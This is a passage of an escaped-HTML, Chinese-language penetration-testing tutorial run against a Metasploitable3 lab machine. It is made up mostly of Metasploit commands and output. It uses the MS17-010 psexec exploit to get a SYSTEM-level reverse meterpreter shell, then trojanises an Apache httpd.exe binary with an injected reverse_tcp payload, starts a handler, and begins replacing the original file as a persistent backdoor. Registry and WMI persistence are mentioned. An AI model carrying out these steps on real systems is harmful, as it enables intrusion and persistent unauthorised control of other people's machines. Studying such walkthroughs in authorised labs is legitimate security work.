                                                                        Architecture : x64<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      41. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        System Language : en_US<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      42. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        Domain : WORKGROUP<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      43. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        Logged On Users : 2<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      44. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        Meterpreter : x64\/windows<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      45. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        meterpreter > getuid<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      46. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        Server username: NT AUTHORITY\\SYSTEM<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      47. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        meterpreter ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                                      48. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        <\/div>\n<\/div>\n<\/li>\n
                                                                      49. \n
                                                                        \n
                                                                        <\/div>\n<\/div>\n
                                                                        \n
                                                                        \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                        <\/code><\/pre>\n
                                                                        7\u3001MS17-010 EternalRomance\/EternalSynergy\/EternalChampion<\/h4>\n
                                                                        MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Code Execution<\/code>\u653b\u51fb\u6a21\u5757\u4e5f\u53ef\u7528\u4e8eMS17-0101<\/code>\u6f0f\u6d1e\u5229\u7528\u3002\u800c\u4e14\u6bd4EnternalBlue<\/code>\u66f4\u53ef\u9760\uff0c\u4e0d\u8fc7\u9700\u8981\u547d\u540d\u7ba1\u9053\u3002<\/p>\n
                                                                        \u600e\u4e48\u505a<\/h5>\n
                                                                        \u4f7f\u7528\u6a21\u5757ms17_010_psexec<\/code><\/p>\n
                                                                        <\/code><\/pre>\n
                                                                          \n
                                                                        1. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          msf5<\/span> ><\/span> use<\/span> exploit\/windows\/smb\/ms17_010_psexec<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        2. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          msf5<\/span> exploit(windows\/smb\/ms17_010_psexec)<\/span> ><\/span> set<\/span> RHOSTS<\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        3. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          RHOSTS<\/span> =><\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        4. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          msf5<\/span> exploit(windows\/smb\/ms17_010_psexec)<\/span> ><\/span> set<\/span> PAYLOAD<\/span> windows\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        5. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          PAYLOAD<\/span> =><\/span> windows\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        6. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          msf5<\/span> exploit(windows\/smb\/ms17_010_psexec)<\/span> ><\/span> set<\/span> LHOST<\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        7. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          LHOST<\/span> =><\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        8. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          msf5<\/span> exploit(windows\/smb\/ms17_010_psexec)<\/span> ><\/span> exploit<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        9. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          <\/div>\n<\/div>\n<\/li>\n
                                                                        10. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          [*<\/span>] Started<\/span> reverse<\/span> TCP<\/span> handler<\/span> on<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        11. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          [*<\/span>] 192.168.177.144:445 - Target OS:<\/span> Windows<\/span> Server<\/span> 2008 <\/span>R2<\/span> Standard<\/span> 7601 <\/span>Service<\/span> Pack<\/span> 1<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        12. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Built<\/span> a<\/span> write-what-where<\/span> primitive...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        13. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          [+<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Overwrite<\/span> complete...<\/span> SYSTEM<\/span> session<\/span> obtained!<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        14. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Selecting<\/span> PowerShell<\/span> target<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        15. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          [*<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Executing<\/span> the<\/span> payload...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        16. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          [+<\/span>] 192.168<\/span>.177<\/span>.144<\/span>:445<\/span> -<\/span> Service<\/span> start<\/span> timed<\/span> out,<\/span> OK<\/span> if<\/span> running<\/span> a<\/span> command<\/span> or<\/span> non-service<\/span> executable...<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        17. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          [*<\/span>] Sending<\/span> stage<\/span> (179779<\/span> bytes)<\/span> to<\/span> 192.168<\/span>.177<\/span>.144<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        18. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          [*<\/span>] Meterpreter<\/span> session<\/span> 2<\/span> opened<\/span> (192.168.177.143:4444<\/span> -><\/span> 192.168<\/span>.177<\/span>.144<\/span>:62432)<\/span> at<\/span> 2019-04-28 09:37:48<\/span> +0800<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        19. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          <\/div>\n<\/div>\n<\/li>\n
                                                                        20. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          meterpreter<\/span> ><\/span> getuid<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        21. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          Server username:<\/span> NT<\/span> AUTHORITY\\SYSTEM<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        22. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          meterpreter<\/span> ><\/span> sysinfo<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        23. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          Computer :<\/span> METASPLOITABLE3<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        24. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          OS :<\/span> Windows<\/span> 2008 <\/span>R2<\/span> (Build<\/span> 7601<\/span>,<\/span> Service<\/span> Pack<\/span> 1<\/span>).<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        25. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          Architecture :<\/span> x64<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        26. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          System Language :<\/span> en_US<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        27. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          Domain :<\/span> WORKGROUP<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        28. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          Logged On Users :<\/span> 2<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        29. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          Meterpreter :<\/span> x86\/windows<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        30. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          meterpreter<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                                        31. \n
                                                                          \n
                                                                          <\/div>\n<\/div>\n
                                                                          \n
                                                                          \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                          <\/code><\/pre>\n
                                                                          8\u3001\u5b89\u88c5\u540e\u95e8<\/h4>\n
                                                                          \u83b7\u53d6shell<\/code>\u540e\uff0c\u6211\u4eec\u5982\u679c\u9700\u8981\u786e\u4fdd\u80fd\u6301\u4e45\u6027\u7684\u8bbf\u95ee\u76ee\u6807\u7cfb\u7edf\uff0c\u6211\u4eec\u9700\u8981\u5b89\u88c5\u540e\u95e8\u3002<\/p>\n
                                                                          \u51c6\u5907\u5de5\u4f5c<\/h5>\n
                                                                          \u901a\u8fc7\u4e4b\u524d\u7684\u6f0f\u6d1e\u5229\u7528\uff0c\u6211\u4eec\u5df2\u7ecf\u83b7\u5f97\u4e86\u4e0e\u76ee\u6807\u673a\u7684session<\/code>\uff0c\u6211\u4eec\u5c06\u5229\u7528meterpreter session<\/code>\u6765\u5b89\u88c5\u540e\u95e8\u670d\u52a1\u3002\u8fd9\u91cc\u4ee5httpd.exe<\/code>\u4e3a\u4f8b\u3002<\/p>\n
                                                                          <\/code><\/pre>\n
                                                                            \n
                                                                          1. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            meterpreter<\/span> ><\/span> ps<\/span> -S<\/span> httpd.exe<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                          2. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            Filtering<\/span> on<\/span> 'httpd.exe'<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                          3. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            Process<\/span> List<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                          4. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            ============<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                          5. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            PID<\/span> PPID<\/span> Name<\/span> Arch<\/span> Session<\/span> User<\/span> Path<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                          6. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            ---<\/span> ----<\/span> ----<\/span> ----<\/span> -------<\/span> ----<\/span> ----<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                          7. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            1304 <\/span>1816 <\/span>dcserverhttpd.exe<\/span> x86<\/span> 0<\/span> NT<\/span> AUTHORITY\\LOCAL<\/span> SERVICE<\/span> C:\\ManageEngine\\DesktopCentral_Server\\apache\\bin\\dcserverhttpd.exe<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                          8. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            1816 <\/span>472<\/span> dcserverhttpd.exe<\/span> x86<\/span> 0<\/span> NT<\/span> AUTHORITY\\LOCAL<\/span> SERVICE<\/span> C:\\ManageEngine\\DesktopCentral_Server\\apache\\bin\\dcserverhttpd.exe<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                          9. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            3180 <\/span>472<\/span> httpd.exe<\/span> x64<\/span> 0<\/span> NT<\/span> AUTHORITY\\LOCAL<\/span> SERVICE<\/span> C:\\wamp\\bin\\apache\\Apache2.2.21\\bin\\httpd.exe<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                          10. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            3880 <\/span>3180 <\/span>httpd.exe<\/span> x64<\/span> 0<\/span> NT<\/span> AUTHORITY\\LOCAL<\/span> SERVICE<\/span> C:\\wamp\\bin\\apache\\Apache2.2.21\\bin\\httpd.exe<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                          11. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            meterpreter<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                                          12. \n
                                                                            \n
                                                                            <\/div>\n<\/div>\n
                                                                            \n
                                                                            \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                            <\/code><\/pre>\n
                                                                            \u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u5c06\u5229\u7528windows<\/code>\u6ce8\u518c\u8868\u6301\u4e45\u6027\u6a21\u5757\u5b89\u88c5\u968f\u7cfb\u7edf\u542f\u52a8\u7684\u540e\u95e8\u3002<\/p>\n
                                                                            \u6700\u540e\u6211\u4eec\u5c06\u5229\u7528WMI<\/code>( Windows Management Instrumentation )\u521b\u5efa\u4e00\u4e2a\u65e0\u6587\u4ef6\u540e\u95e8\u3002<\/p>\n
                                                                            \u600e\u4e48\u505a<\/h5>\n
                                                                            1\u3001\u4e0d\u80fd\u5728\u7a0b\u5e8f\u8fd0\u884c\u7684\u65f6\u5019\u5b89\u88c5\u540e\u95e8\uff0c\u6240\u4ee5\u5148\u6740\u6b7b\u8fdb\u7a0b<\/p>\n
                                                                            <\/code><\/pre>\n
                                                                              \n
                                                                            1. \n
                                                                              \n
                                                                              <\/div>\n<\/div>\n
                                                                              \n
                                                                              meterpreter<\/span> > kill 3880<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                            2. \n
                                                                              \n
                                                                              <\/div>\n<\/div>\n
                                                                              \n
                                                                              Killing<\/span>: 3880<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                            3. \n
                                                                              \n
                                                                              <\/div>\n<\/div>\n
                                                                              \n
                                                                              meterpreter<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                                            4. \n
                                                                              \n
                                                                              <\/div>\n<\/div>\n
                                                                              \n
                                                                              \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                              <\/code><\/pre>\n
                                                                              2\u3001\u5c06\u9700\u8981\u66ff\u6362\u6210\u540e\u95e8\u7684\u7a0b\u5e8f\u4e0b\u8f7d\u4e0b\u6765<\/p>\n
                                                                              <\/code><\/pre>\n
                                                                                \n
                                                                              1. \n
                                                                                \n
                                                                                <\/div>\n<\/div>\n
                                                                                \n
                                                                                meterpreter<\/span> > download<\/span> C<\/span>:\\\\wamp<\/span>\\\\bin<\/span>\\\\apache<\/span>\\\\apache2<\/span>.2<\/span>.21<\/span>\\\\bin<\/span>\\\\httpd<\/span>.exe<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                              2. \n
                                                                                \n
                                                                                <\/div>\n<\/div>\n
                                                                                \n
                                                                                [*]<\/span> Downloading<\/span>: C<\/span>:\\wamp<\/span>\\bin<\/span>\\apache<\/span>\\apache2<\/span>.2<\/span>.21<\/span>\\bin<\/span>\\httpd<\/span>.exe<\/span> -<\/span>> httpd<\/span>.exe<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                              3. \n
                                                                                \n
                                                                                <\/div>\n<\/div>\n
                                                                                \n
                                                                                [*]<\/span> Downloaded<\/span> 21.00<\/span> KiB<\/span> of<\/span> 21.00<\/span> KiB<\/span> (100.0<\/span>%): C<\/span>:\\wamp<\/span>\\bin<\/span>\\apache<\/span>\\apache2<\/span>.2<\/span>.21<\/span>\\bin<\/span>\\httpd<\/span>.exe<\/span> -<\/span>> httpd<\/span>.exe<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                              4. \n
                                                                                \n
                                                                                <\/div>\n<\/div>\n
                                                                                \n
                                                                                [*]<\/span> download<\/span> : C<\/span>:\\wamp<\/span>\\bin<\/span>\\apache<\/span>\\apache2<\/span>.2<\/span>.21<\/span>\\bin<\/span>\\httpd<\/span>.exe<\/span> -<\/span>> httpd<\/span>.exe<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                              5. \n
                                                                                \n
                                                                                <\/div>\n<\/div>\n
                                                                                \n
                                                                                meterpreter<\/span> ><\/div>\n<\/div>\n<\/li>\n
                                                                              6. \n
                                                                                \n
                                                                                <\/div>\n<\/div>\n
                                                                                \n
                                                                                \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                <\/code><\/pre>\n
                                                                                3\u3001\u5c06\u4f1a\u8bdd\u9000\u56de\u5230\u540e\u53f0\uff0c\u4f7f\u7528reverse_tcp<\/code>\u653b\u51fb\u8f7d\u8377\uff0c\u4f7f\u7528generate<\/code>\u751f\u6210\u540e\u95e8\u6587\u4ef6\u3002<\/p>\n
                                                                                <\/code><\/pre>\n
                                                                                  \n
                                                                                1. \n
                                                                                  \n
                                                                                  <\/div>\n<\/div>\n
                                                                                  \n
                                                                                  msf5 exploit(windows\/smb\/<\/span>ms17_010_psexec) > use payload\/windows\/<\/span>x64\/meterpreter\/<\/span>reverse_tcp<\/div>\n<\/div>\n<\/li>\n
                                                                                2. \n
                                                                                  \n
                                                                                  <\/div>\n<\/div>\n
                                                                                  \n
                                                                                  msf5 payload(windows\/x64\/<\/span>meterpreter\/reverse_tcp) > set LHOST 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                3. \n
                                                                                  \n
                                                                                  <\/div>\n<\/div>\n
                                                                                  \n
                                                                                  LHOST => 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                4. \n
                                                                                  \n
                                                                                  <\/div>\n<\/div>\n
                                                                                  \n
                                                                                  msf5 payload(windows\/x64\/<\/span>meterpreter\/reverse_tcp) > generate -p Windows -x \/<\/span>root\/httpd.exe -k -f exe -o \/<\/span>root\/httpd-backdoored.exe<\/div>\n<\/div>\n<\/li>\n
                                                                                5. \n
                                                                                  \n
                                                                                  <\/div>\n<\/div>\n
                                                                                  \n
                                                                                  [*] Writing 29184<\/span> bytes to \/root\/<\/span>httpd-backdoored.exe...<\/div>\n<\/div>\n<\/li>\n
                                                                                6. \n
                                                                                  \n
                                                                                  <\/div>\n<\/div>\n
                                                                                  \n
                                                                                  msf5 payload(windows\/x64\/<\/span>meterpreter\/reverse_tcp) ><\/div>\n<\/div>\n<\/li>\n
                                                                                7. \n
                                                                                  \n
                                                                                  <\/div>\n<\/div>\n
                                                                                  \n
                                                                                  \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                  <\/code><\/pre>\n
                                                                                  \u5173\u4e8egenerate<\/code>\u7684\u53c2\u6570\u8bf4\u660e\uff0c\u53ef\u4ee5\u67e5\u770b\u5e2e\u52a9\u4fe1\u606f<\/p>\n
                                                                                  <\/code><\/pre>\n
                                                                                    \n
                                                                                  1. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    msf5 payload(windows\/x64\/meterpreter\/reverse_tcp) > generate -h<\/div>\n<\/div>\n<\/li>\n
                                                                                  2. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    Usage: generate [options]<\/div>\n<\/div>\n<\/li>\n
                                                                                  3. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    Generates a payload.<\/div>\n<\/div>\n<\/li>\n
                                                                                  4. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    OPTIONS:<\/div>\n<\/div>\n<\/li>\n
                                                                                  5. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n<\/li>\n
                                                                                  6. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -E Force encoding<\/div>\n<\/div>\n<\/li>\n
                                                                                  7. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -O <opt> Deprecated<\/span>: alias<\/span> for<\/span> the '-o'<\/span> option<\/div>\n<\/div>\n<\/li>\n
                                                                                  8. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -P <opt> Total desired payload size, auto-produce approproate NOPsled length<\/div>\n<\/div>\n<\/li>\n
                                                                                  9. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -S <opt> The new section name<\/span> to<\/span> use when generating (large) Windows binaries<\/div>\n<\/div>\n<\/li>\n
                                                                                  10. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -b <opt> The list of<\/span> characters to<\/span> avoid example: '\\x00\\xff'<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                  11. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -e <opt> The encoder to<\/span> use<\/div>\n<\/div>\n<\/li>\n
                                                                                  12. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -f <opt> Output format: bash,c,csharp,dw,dword,hex,java,js_be,js_le,num,perl,pl,powershell,ps1,py,python,raw,rb,ruby,sh,vbapplication,vbscript,asp,aspx,aspx-exe,axis2,dll,elf,elf-so,exe,exe-only,exe-service,exe-small,hta-psh,jar,jsp,loop-vbs,macho,msi,msi-nouac,osx-app,psh,psh-cmd,psh-net,psh-reflection,vba,vba-exe,vba-psh,vbs,war<\/div>\n<\/div>\n<\/li>\n
                                                                                  13. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -h Show this message<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                  14. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -i <opt> The number of<\/span> times to<\/span> encode the payload<\/div>\n<\/div>\n<\/li>\n
                                                                                  15. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -k Preserve the template behavior and<\/span> inject the payload as<\/span> a new thread<\/div>\n<\/div>\n<\/li>\n
                                                                                  16. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -n <opt> Prepend a nopsled of<\/span> [length] size on<\/span> to<\/span> the payload<\/div>\n<\/div>\n<\/li>\n
                                                                                  17. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -o <opt> The output file<\/span> name<\/span> (otherwise<\/span> stdout)<\/div>\n<\/div>\n<\/li>\n
                                                                                  18. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -p <opt> The platform<\/span> of<\/span> the payload<\/div>\n<\/div>\n<\/li>\n
                                                                                  19. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -s <opt> NOP sled length.<\/div>\n<\/div>\n<\/li>\n
                                                                                  20. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    -x <opt> Specify a custom executable file<\/span> to<\/span> use as<\/span> a template<\/div>\n<\/div>\n<\/li>\n
                                                                                  21. \n
                                                                                    \n
                                                                                    <\/div>\n<\/div>\n
                                                                                    \n
                                                                                    \u590d\u5236\u4ee3\u7801<\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                    <\/code><\/pre>\n
                                                                                    4\u3001\u542f\u52a8\u4e00\u4e2a\u76d1\u542c\uff0c\u76d1\u542c\u540e\u95e8\u7684\u53cd\u5411\u8fde\u63a5\uff0c\u5e76\u4f7f\u7528expolit -j<\/code>\u653e\u5230\u540e\u53f0\u8fd0\u884c<\/p>\n
                                                                                    <\/code><\/pre>\n
                                                                                      \n
                                                                                    1. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      msf5<\/span> payload(windows\/x64\/meterpreter\/reverse_tcp)<\/span> ><\/span> use<\/span> exploit\/multi\/handler<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                    2. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      msf5<\/span> exploit(multi\/handler)<\/span> ><\/span> set<\/span> payload<\/span> windows\/x64\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                    3. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      payload<\/span> =><\/span> windows\/x64\/meterpreter\/reverse_tcp<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                    4. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      msf5<\/span> exploit(multi\/handler)<\/span> ><\/span> set<\/span> LHOST<\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                    5. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      LHOST<\/span> =><\/span> 192.168<\/span>.177<\/span>.143<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                    6. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      msf5<\/span> exploit(multi\/handler)<\/span> ><\/span> exploit<\/span> -j<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                    7. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      [*<\/span>] Exploit<\/span> running<\/span> as<\/span> background<\/span> job<\/span> 0<\/span>.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                    8. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      [*<\/span>] Exploit<\/span> completed,<\/span> but<\/span> no<\/span> session<\/span> was<\/span> created.<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                    9. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n<\/li>\n
                                                                                    10. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      [*<\/span>] Started<\/span> reverse<\/span> TCP<\/span> handler<\/span> on<\/span> 192.168<\/span>.177<\/span>.143<\/span>:4444<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                    11. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      msf5<\/span> exploit(multi\/handler)<\/span> ><\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                    12. \n
                                                                                      \n
                                                                                      <\/div>\n<\/div>\n
                                                                                      \n
                                                                                      \u590d\u5236\u4ee3\u7801<\/span><\/span><\/div>\n<\/div>\n<\/li>\n<\/ol>\n
                                                                                      <\/code><\/pre>\n
                                                                                      5\u3001\u5207\u56de\u4e4b\u524d\u7684meterpreter session<\/code>\uff0c\u4e0a\u4f20\u540e\u95e8\u6587\u4ef6\u5e76\u91cd\u547d\u540d\u3002<\/p>\n
                                                                                      <\/code><\/pre>\n
                                                                                        \n
                                                                                      1. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        msf5 exploit(multi\/handler) > sessions -i 3<\/span><\/div>\n<\/div>\n<\/li>\n
                                                                                      2. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        [*] Starting interaction with 3.<\/span>..<\/div>\n<\/div>\n<\/li>\n
                                                                                      3. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n<\/li>\n
                                                                                      4. \n
                                                                                        \n
                                                                                        <\/div>\n<\/div>\n
                                                                                        \n
